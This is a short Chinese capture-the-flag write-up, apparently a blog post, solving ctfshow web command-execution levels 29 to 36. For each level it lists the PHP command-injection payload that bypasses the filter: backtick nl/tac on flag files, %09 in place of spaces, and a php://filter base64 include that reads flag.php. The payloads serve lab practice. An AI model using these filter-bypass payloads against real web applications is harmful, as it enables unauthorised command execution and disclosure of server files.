ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
tod1133 分钟前
Redis:从消息中间件到分布式核心
服务器·开发语言·redis·分布式
Ronin3053 分钟前
连接管理模块和服务器模块
服务器·rabbitmq·网络通信·tcp连接
杨云龙UP6 分钟前
Oracle RMAN 归档日志清理标准流程:CROSSCHECK / EXPIRED / SYSDATE-N
运维·服务器·数据库
哈哈浩丶7 分钟前
OP-TEE-OS:综述
android·linux·驱动开发
哈哈浩丶16 分钟前
ATF (ARM Trusted Firmware) -1:综述
linux·arm开发·驱动开发
科济管线制药IPD咨询18 分钟前
从IPD实践者到研发体系架构师(四):在经典IPD阶段关卡基础上,如何融入敏捷迭代、DevOps循环和客户共创触点?
运维·devops
小李独爱秋23 分钟前
模拟面试:lvs常见的工作模式有哪些?各有什么特点?
linux·运维·面试·职场和发展·操作系统·职场发展·lvs
吴声子夜歌1 小时前
小程序——生命周期函数和事件处理函数
服务器·前端·小程序
IT研究所10 小时前
IT 资产管理 (ITAM) 与 ITSM 协同实践:构建从资产到服务的闭环管理体系
大数据·运维·人工智能·科技·安全·低代码·自动化
Codefengfeng10 小时前
分辨压缩包的真加密与伪加密
linux·运维·网络